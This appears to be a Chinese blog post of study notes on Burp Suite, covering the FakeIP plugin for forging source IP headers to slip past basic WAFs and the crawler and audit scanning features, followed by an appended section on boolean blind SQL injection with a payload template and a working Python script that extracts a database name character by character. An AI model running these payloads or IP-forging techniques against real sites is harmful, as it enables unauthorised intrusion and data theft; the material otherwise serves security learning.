泷羽Sec-Burp Suite IP伪造和爬虫审计

声明!
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

一、安装插件

1.先安装jar文件,在安装插件

二、FakeIP使用

1.进行拦截,随便抓取一个包右键请求包,在"Extensions"选项,burpFakelP插件

customlP:生成指定
IP127.0.0.1:回环地址
randomlP:生成随机
IPAutoXFF:默认字段
生成了大量随机IP,在请求包中然后我们在将请求发送到爆破模块中,添加payload2.IP伪造和IP代理的区别

IP伪造在通过在修改或者伪造请求包中的源IP,来欺骗浏览器和绕过一些基础的waf的作用,也有一定的隐藏效果
IP伪造是伪造假的IP,只能绕过一些基础的防御而,IP代理池里的IP都是真实存在的,每一个请求都是正常的访问

三、爬虫和审计

点击"仪表盘"的首页,这有两个任务分别是 "新建扫描" 和 "新建实时任务"
1.我们先来看新建实时任务,分别有"实时审计"和"实时被动爬虫"
实时审计:
    是对通过代理的所有流量进行实时分析和检测,都是通过官方的POC进行验证
实时被动爬虫:
    不会主动向目标服务器发送请求,而是通过监听流量来收集信息。
实时审计的扫描设定:
    通过配置如何执行扫描的设置
审计优化:
    设置审计的速度和准确率
速度:
    快速,适中,全面

准确率:
    减少漏报率,适中,减少误报率
插入点的类型:
    URL的参数值,Body的参数值,cookie参数值,参数名称,HTTP报头,整个主体,URL路径的文件名,URL路径的文件夹
实时审计和实时被动爬虫结合,就能通过访问网站同时进行信息收集和实时审计,我们随便浏览几个网站,爬虫收集的信息都会传到"目标"的站点地图方便查看,我们在看实时审计,可能没有主动扫描来精确

2.新建扫描

我们在来看看新建扫描,分别有"爬虫与审计"和"爬虫"
爬虫与审计:    
    爬虫和审计同时进行,主动请求网站进行审计
爬虫:
    就主动请求服务器访问,不会进行审计
扫描设定:
    在速度和覆盖范围之间进行选择
轻量:速度最快,范围最小
快速:速度较快,范围较小
平衡:速度适中,范围适中
深度:深度最慢,范围最大
应用登录:
    碰到需要登录的页面,进行自动登录
资源池: 
    根据目标服务器的负担来设置扫捕的速度
设置后就确定开运行

### 使用 Burp Suite 实现布尔盲注攻击爆破 #### 配置 Burp Suite 测试环境 为了成功执行布尔盲注攻击,需先配置好测试环境。启动 Kali 虚拟机并打开 Burp Suite 进入 Proxy 工具,在 Intercept 界面确认拦截状态为关闭 (Intercept is off)[^2]。 #### 设置代理浏览器 确保目标应用程序流量通过 Burp Suite 的代理发送。这通常涉及设置浏览器或其他 HTTP 客户端的代理设置指向运行 Burp Suite 的机器 IP 地址以及默认监听端口 8080[^1]。 #### 发现注入点 识别应用中的潜在 SQL 注入漏洞位置非常重要。这些地方通常是查询字符串参数、POST 数据字段或是 Cookie 中可被操纵的部分。对于布尔型盲注来说,重点在于观察页面响应的变化模式来判断是否存在注入可能性及其类型。 #### 构造有效载荷 构建用于检测提取信息的有效载荷是关键步骤之一。当知道库名长度为八时,可以设计如下形式的基础语句: ```sql AND ASCII(SUBSTRING((SELECT schema_name FROM information_schema.schemata LIMIT 1), position, 1)) > guess_value -- ``` 其中 `position` 表示当前猜测的位置(从1到8),而 `guess_value` 是用来比较ASCII码值的一个变量。如果返回真,则说明实际字符大于等于所猜数值;反之则小于该数[^4]。 #### 自动化过程 手动逐位推测效率低下且容易出错,因此建议编写 Python 或其他编程语言编写的脚本来自动化这一流程。下面是一个简单的Python例子,它会遍历每一个可能的字符直到找到匹配项为止: ```python import requests def check(payload): url = "http://example.com/vulnerable_page" params = {"param": payload} response = requests.get(url, params=params) # 根据实际情况修改条件表达式 return 'True condition' in response.text for i in range(1, 9): low, high = ord('a'), ord('z') while low <= high: mid = (low + high) >> 1 payload = f"' OR ASCII(SUBSTR(database(),{i},1))>{mid} AND '1'='1" if check(payload): low = mid + 1 else: high = mid - 1 print(chr(low)) ``` 此代码片段展示了如何利用二分查找算法高效地确定每个未知字符的具体值。请注意替换 URL 及相应参数以适应具体场景需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值